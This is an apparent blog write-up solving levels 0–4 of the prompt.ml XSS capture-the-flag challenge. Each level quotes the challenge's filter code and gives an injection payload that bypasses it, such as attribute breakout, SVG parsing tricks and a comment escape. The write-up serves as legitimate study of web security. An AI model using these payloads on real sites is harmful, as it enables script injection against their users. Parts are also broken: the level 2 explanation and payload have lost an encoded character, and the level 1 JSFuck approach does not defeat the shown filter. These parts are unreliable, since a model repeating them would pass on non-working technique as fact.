Prompt(1) Writeup

July 19, 2020

Prompt(1) Writeup - Part 1

This is going to be a writeup on how to solve the Prompt(1) challenges. Prompt(1) challenges are basically XSS scripting challenges where users need to prompt 1 to win. Here's the link for the site: - https://prompt.ml/. Let's go 😀

0

Here is the javascript source that this challenge uses.

function escape(input) {
    // warm up
    // script should be executed without user interaction
    return '<input type="text" value="' + input + '">';
}

First, we remove the quotes by adding ". Then we insert a script tag containing prompt(1).

Payload : "><script>prompt(1)</script><svg src="

1

function escape(input) {
    // tags stripping mechanism from ExtJS library
    // Ext.util.Format.stripTags
    var stripTagsRE = /<\/?[^>]+>/gi;
    input = input.replace(stripTagsRE, '');

    return '<article>' + input + '</article>';
}

I'm going to introduce an obfuscation tool known as JSFuck. It takes the programming language down to 6 characters - ()![]+. Although an ineffective approach this will work.

Payload : Go to jsfuck.com and encode <script>prompt(1)</script>

2

function escape(input) {
    //                      v-- frowny face
    input = input.replace(/[=(]/g, '');

    // ok seriously, disallows equal signs and open parenthesis
    return input;
}

This disallows equal signs and left open parenthesis as shown in the comment. We can use the SVG element to our advantage here. Inside the SVG element, the code is parsed via XML. So we can use the character ( as an alternative to (.

Payload : <svg><script>prompt(1)</script>

3

function escape(input) {
    // filter potential comment end delimiters
    input = input.replace(/->/g, '_');

    // comment the input to avoid script execution
    return '<!-- ' + input + ' -->';
}

Here the character "->" which can be used to get out of the comments is changed to "_". Luckily "<!--" can be commented out using "--!>".

Payload : --!> <script>prompt(1)</script><!--

4

function escape(input) {
    // make sure the script belongs to own site
    // sample script: http://prompt.ml/js/test.js
    if (/^(?:https?:)?\/\/prompt\.ml\//i.test(decodeURIComponent(input))) {
        var script = document.createElement('script');
        script.src = input;
        return script.outerHTML;
    } else {
        return 'Invalid resource.';
    }
}

This needs me to have a domain. Don't have one. There is a nice solution by cure53 at https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#level-4.

Payload: None